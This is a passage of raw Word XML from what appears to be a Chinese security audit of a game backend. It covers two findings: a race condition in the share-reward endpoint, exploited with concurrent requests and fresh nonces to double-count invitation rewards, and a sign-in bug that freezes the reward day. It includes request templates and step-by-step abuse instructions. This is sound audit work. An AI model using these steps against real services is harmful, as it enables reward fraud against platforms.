              <w:t>Authorization: Bearer &lt;同一账号A的有效Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;appKey&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;同一时间戳&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;随机nonce_2，与nonce_1不同&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;对当前请求体+参数计算的签名_2&gt;</w:t>
              <w:br/>
              <w:br/>
              <w:t>{</w:t>
              <w:br/>
              <w:t xml:space="preserve">  "inviteeUserId": &lt;同一账号B的userId&gt;,</w:t>
              <w:br/>
              <w:t xml:space="preserve">  "shareType": "level3"</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利用步骤：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="969"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>准备条件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：攻击者使用账号 A 邀请账号 B 注册（确保 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>B.inviterUserId = A.userId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>），并等待账号 B 完成 KYC 认证（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>isKycVerified = 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="970"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>构造并发请求</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：使用账号 A 的有效 Token，构造两条 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>shareType=level3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inviteeUserId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 相同的请求，分别使用不同的 nonce 值并各自签名（不同 nonce 可绕过 nonce 重放防护）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="971"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>并发提交</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：同时发出两条请求（可使用 HTTP/2 多路复用、线程并发或工具如 turbo intruder）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="972"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>触发竞态</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：两条事务均在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UserInvitationRecord</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 记录尚未写入时完成 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByInviterUserIdAndInviteeUserIdForUpdate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 查询，均见空结果，均执行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>taskExecutionService.updateProgress(inviterUserId, "3", 1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> —— 进度被计入两次；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="973"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>收取双倍奖励</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：若 level3 任务进度满足奖励阈值，任务系统自动发放两次道具或代币奖励；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="974"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>扩展</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：对每一名已 KYC 的被邀请人均可执行同样操作（level2 同理），批量刷取奖励。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>⚠️ 权限要求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="975"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>是否需要登录：是</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="976"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>权限级别：普通用户（需有效 Bearer Token；需至少一名真实的、已完成 KYC 的被邀请人，无法伪造邀请关系）</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77"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>ShareController.java.shareComplete → ShareService.java.shareComplete → ShareService.java.shareLevel3Success → UserInvitationRecord.java.setIsRegistered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audit_m193_1051_shareComplete_ctrl-path19of23.md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：SignInExecutionService.java#createAndSaveSignInRecord</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_46" w:id="46"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞45：签到奖励日计算逻辑缺陷 — 超过100次签到后奖励天数永久冻结</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="978"/>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：签到次数查询分页上限导致奖励周期计算永久错误（奖励天数冻结）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="979"/>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src/main/java/com/gameBack/mjservice/service/SignInExecutionService.java:createAndSaveSignInRecord</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="980"/>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资金安全</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="981"/>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982"/>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983"/>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createAndSaveSignInRecord</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 中通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>PageRequest.of(0, 100)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 最多只取最近 100 条签到记录，再用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>.stream().count()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 统计 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>signedCount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，用来计算本次签到对应周期内的第几天（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>nextDay = signedCount % cycle + 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）。当用户累计签到次数超过 100 次后，该查询始终返回恰好 100 条记录，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>signedCount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 永久被截断为 100，导致 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>nextDay = 100 % 28 + 1 = 17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（以默认28天周期为例）固定不变。自第102次签到起，用户将永远领取第17天的奖励，而非按设计逐日循环（第18、19、…、28天，再回到第1天），完全绕过了28天奖励周期设计。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="984"/>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认证层（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>TokenAuthFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">）从 Bearer Token 解析 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@CurrentUserId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 注入后传入服务层，全程不可由外部伪造。但在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>createAndSaveSignInRecord</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>performSignInInsert</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的 REQUIRES_NEW 事务内）查询签到次数时，分页上限 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>PageRequest.of(0, 100)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 造成如下计算偏差：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实际历史签到次数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查询返回条数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signedCount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计算出的 nextDay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正确 nextDay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99 % 28 + 1 = 16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100 % 28 + 1 = </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:b w:val="true"/>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100（上限截断）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100 % 28 + 1 = </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:b w:val="true"/>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100（上限截断）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100（上限截断）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999 % 28 + 1 = 20 ✗</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>从第102次签到开始，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>nextDay</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 永远等于17，所有后续奖励发放均触发第17天奖励配置，周期机制完全失效。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="985"/>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986"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>若第17天奖励价值高于其他天（如游戏内货币、稀有道具），长期用户可持续反复获得该高价值奖励，导致平台超额发放游戏资产；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="987"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>若第18～28天配置了更高阶奖励（多数签到机制设计为越到周期末奖励越丰厚，如第28天"满签奖励"），忠诚用户因该缺陷永远无法领取第17天之后的高阶奖励，导致应得利益损失，可能引发用户投诉及平台信誉风险。</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HTTP 入口：SignInExecutionController.java</w:t>
              <w:br/>
              <w:t>@PostMapping("/do")</w:t>
              <w:br/>
              <w:t>public ApiResponse&lt;Boolean&gt; doSignIn(@CurrentUserId Long userId) { // ← userId 从 Token 安全注入</w:t>
              <w:br/>
              <w:t xml:space="preserve">    boolean signInSuccess = signInExecutionService.doSignIn(userId);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return ApiResponse.success(signInSuccess);</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② 分布式锁层：SignInExecutionService.java#doSignIn</w:t>
              <w:br/>
              <w:t>public boolean doSignIn(Long userId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    LocalDate date = LocalDate.now(); // ← 日期由服务端生成，不可外部控制</w:t>
              <w:br/>
              <w:t xml:space="preserve">    String lockKey = LOCK_KEY_PREFIX + userId + ":" + date;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    RLock lock = redissonClient.getLock(lockKey);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return selfProvider.getObject().doSignInBusiness(userId, date); // ← 锁包裹事务，设计正确</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ③ 业务逻辑层：SignInExecutionService.java#doSignInBusiness</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public boolean doSignInBusiness(Long userId, LocalDate date) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    selfProvider.getObject().performSignInInsert(userId, date); // ← 触发 REQUIRES_NEW 内部事务</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ④ 独立事务：SignInExecutionService.java#performSignInInsert</w:t>
              <w:br/>
              <w:t>@Transactional(propagation = Propagation.REQUIRES_NEW)</w:t>
              <w:br/>
              <w:t>public void performSignInInsert(Long userId, LocalDate date) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    createAndSaveSignInRecord(userId, date); // ← 调用私有方法（在同一事务内）</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ⑤ 漏洞点：SignInExecutionService.java#createAndSaveSignInRecord</w:t>
              <w:br/>
              <w:t>private void createAndSaveSignInRecord(Long userId, LocalDate date) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    long signedCount = signInRecordRepository.findByUserIdOrderBySignInDateDesc(</w:t>
              <w:br/>
              <w:t xml:space="preserve">            userId,</w:t>
              <w:br/>
              <w:t xml:space="preserve">            org.springframework.data.domain.PageRequest.of(0, 100) // ← 漏洞点：硬上限100条</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ).stream().count();</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    // 当用户历史签到 &gt; 100 次时，上述查询始终返回100条，signedCo</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>unt 永久被截断为 100</w:t>
              <w:br/>
              <w:t xml:space="preserve">    </w:t>
              <w:br/>
              <w:t xml:space="preserve">    int cycle = 28;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    Optional&lt;SignInCycleConfig&gt; cycleOpt = signInCycleConfigRepository.findAll().stream().findFirst();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (cycleOpt.isPresent() &amp;&amp; cycleOpt.get().getCycleDays() != null) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        cycle = cycleOpt.get().getCycleDays();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    </w:t>
              <w:br/>
              <w:t xml:space="preserve">    int nextDay = (int) (signedCount % cycle) + 1;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ↑ 漏洞触发：signedCount 被截断为100，nextDay 永久等于 100 % 28 + 1 = 17</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // 真正的 nextDay 应为 actualTotalCount % cycle + 1，但 actualTotalCount 已无法获取</w:t>
              <w:br/>
              <w:t xml:space="preserve">    </w:t>
              <w:br/>
              <w:t xml:space="preserve">    List&lt;SignInDayReward&gt; dayRewards = signInDayRewardRepository</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .findBySignInDayOrderBySortOrderAsc(nextDay); // ← 始终查询第17天奖励配置</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    for (int i = 0; i &lt; dayRewards.size(); i++) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        SignInDayReward r = dayRewards.get(i);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">        rewardApplyService.apply(userId, r.getRewardType(), r.getRewardValue(), r.getMinerLevel());</w:t>
              <w:br/>
              <w:t xml:space="preserve">        // ← 第102次及之后所有签到均发放第17天奖励，永不循环至第18～28天</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/api/signIn/do HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target_host&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;已累计签到101次以上的有效用户Token&gt;</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Content-Type: application/json</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
